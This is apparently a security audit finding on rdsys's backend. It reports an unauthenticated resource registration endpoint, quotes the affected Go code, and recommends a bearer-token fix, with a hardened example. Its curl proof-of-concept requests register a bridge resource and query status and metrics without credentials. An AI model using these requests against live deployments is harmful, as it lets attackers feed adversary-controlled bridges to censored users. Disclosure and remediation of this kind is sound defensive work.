Missing Authentication at Resource Registration
While auditing the rdsys source code, it was noticed that the backend performs no authentication on its resource registration endpoint. Any client that can reach the backend's HTTP listener can therefore register arbitrary resources, for example bridge addresses under the adversary's control, which the backend then stores and distributes to users.
The following snippet shows the affected code. Unlike the other endpoints, the POST branch of the resources handler dispatches straight to postResourcesHandler without any authentication check, and that handler adds every submitted resource to the collection and saves it to the resource store.
Affected file: rdsys/internal/backend.go
Affected code:
func (b *BackendContext) resourcesHandler(w http.ResponseWriter, r *http.Request) {
	switch r.Method {
	[...]
	case http.MethodPost:
		// No credential check happens before the request reaches the registration handler.
		if r.URL.Path == b.Config.Backend.ResourcesEndpoint {
			b.postResourcesHandler(w, r)
	[...]
}

func (b *BackendContext) postResourcesHandler(w http.ResponseWriter, req *http.Request) {
	body, err := ioutil.ReadAll(req.Body)
	[...]
	rTypes := map[string]struct{}{}
	for _, r := range rs {
		// Every resource in the request body is added to the live collection as-is.
		b.Resources.Add(r)
		rTypes[r.Type()] = struct{}{}
		log.Printf("Added %s's %q resource to collection.", req.RemoteAddr, r.Type())
	}
	for rType := range rTypes {
		// The affected resource types are then written to the resource store.
		b.rStore.Save(rType)
	}
	[...]
}
The issue can be reproduced with the following cURL request, which registers an obfs2 resource without presenting any credentials. The remaining requests show other endpoints that accept unauthenticated requests as well.
PoC:
curl http://localhost:7100/resources -i --data '[{"type": "obfs2", "address": "1.2.3.2", "port": 1235, "fingerprint":"10282810115283F99ADE5CFE42D49644F45D715D"}]' -XPOST
# Other endpoints which are missing authentication
curl -i -s -k -X $'GET' \
-H $'Host: localhost:7100' \
$'http://localhost:7100/status?id=10282810115283F99ADE5CFE42D49644F45D715D'
curl -i -s -k -X $'GET' \
-H $'Host: localhost:7100' \
$'http://localhost:7100/rdsys-backend-metrics'
To address the issue, the backend should enforce authentication on every endpoint, with particular attention to resource registration. The POST branch of resourcesHandler should reject requests that do not present a valid credential (for example a bearer token compared in constant time) before calling postResourcesHandler, so that an unauthenticated client can neither add resources to the collection nor trigger rStore.Save. The same check should cover the /status and /rdsys-backend-metrics endpoints listed above. Binding the listener to a local interface is not a substitute: any process or host that can reach the port inherits the ability to register resources. With authentication in place, only authorized registrants can add resources to the collection.
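The following example, added here and not part of rdsys or this report, shows the vulnerable registration path next to a hardened one. It reduces rdsys's BackendContext to a hypothetical Backend type holding a slice of resources, assumes a single shared bearer token for registrants, and compares the presented token in constant time. The resource fields are taken from the PoC body above; the sample body, token and handler names are constructed for the example.

```go
package main

import (
	"crypto/subtle"
	"encoding/json"
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"strings"
	"sync"
)

// Resource is a minimal stand-in for an rdsys resource; the field set is an
// assumption for this example, based on the PoC request body.
type Resource struct {
	Type        string `json:"type"`
	Address     string `json:"address"`
	Port        int    `json:"port"`
	Fingerprint string `json:"fingerprint"`
}

// Backend is a hypothetical reduction of rdsys's BackendContext.
type Backend struct {
	mu        sync.Mutex
	resources []Resource
}

// UnauthenticatedPost reproduces the reported defect: any client that can reach
// the listener registers resources without presenting credentials.
func (b *Backend) UnauthenticatedPost(w http.ResponseWriter, r *http.Request) {
	b.StoreResources(w, r)
}

// StoreResources parses a JSON array of resources and adds the valid ones to the
// collection. It does no authentication itself; that is the wrapper's job.
func (b *Backend) StoreResources(w http.ResponseWriter, r *http.Request) {
	if r.Method != http.MethodPost {
		http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
		return
	}
	body, err := io.ReadAll(io.LimitReader(r.Body, 1<<20)) // bound memory per request
	var rs []Resource
	if err != nil || json.Unmarshal(body, &rs) != nil {
		http.Error(w, "bad request", http.StatusBadRequest)
		return
	}
	for _, res := range rs {
		// Reject malformed entries (empty fields, bad port, non-40-char fingerprint).
		if res.Type == "" || res.Address == "" || res.Port < 1 || res.Port > 65535 || len(res.Fingerprint) != 40 {
			http.Error(w, "invalid resource", http.StatusBadRequest)
			return
		}
	}
	b.mu.Lock()
	b.resources = append(b.resources, rs...)
	b.mu.Unlock()
	w.WriteHeader(http.StatusOK)
}

// RequireBearerToken wraps a handler so that only requests carrying the expected
// bearer token reach it. An empty configured token denies every request rather
// than matching an empty header, and the comparison is constant-time.
func RequireBearerToken(token string, next http.HandlerFunc) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		const prefix = "Bearer "
		auth := r.Header.Get("Authorization")
		presented := strings.TrimPrefix(auth, prefix)
		if token == "" || !strings.HasPrefix(auth, prefix) ||
			subtle.ConstantTimeCompare([]byte(presented), []byte(token)) != 1 {
			w.Header().Set("WWW-Authenticate", `Bearer realm="rdsys"`)
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return // the body is never parsed and nothing is stored
		}
		next(w, r)
	}
}

// Count returns the number of registered resources.
func (b *Backend) Count() int {
	b.mu.Lock()
	defer b.mu.Unlock()
	return len(b.resources)
}

// Register POSTs body to h with the given bearer token (empty means no
// Authorization header at all) and returns the HTTP status code.
func Register(h http.Handler, token, body string) int {
	req := httptest.NewRequest(http.MethodPost, "/resources", strings.NewReader(body))
	if token != "" {
		req.Header.Set("Authorization", "Bearer "+token)
	}
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	// Constructed sample body in the same shape as the PoC request.
	body := `[{"type":"obfs4","address":"192.0.2.10","port":443,"fingerprint":"0123456789ABCDEF0123456789ABCDEF01234567"}]`
	vuln := &Backend{}
	fmt.Println("vulnerable, no token:", Register(http.HandlerFunc(vuln.UnauthenticatedPost), "", body), "stored:", vuln.Count())
	fixed := &Backend{}
	h := RequireBearerToken("s3cret-token", fixed.StoreResources)
	fmt.Println("fixed, no token:     ", Register(h, "", body), "stored:", fixed.Count())
	fmt.Println("fixed, wrong token:  ", Register(h, "guess", body), "stored:", fixed.Count())
	fmt.Println("fixed, right token:  ", Register(h, "s3cret-token", body), "stored:", fixed.Count())
}
```

The wrapper rejects the request before the body is read, which is the property the recommendation asks for: an unauthenticated POST never reaches the code that adds to the collection or saves to the store. The same wrapper can be applied to the GET handlers for the status and metrics endpoints.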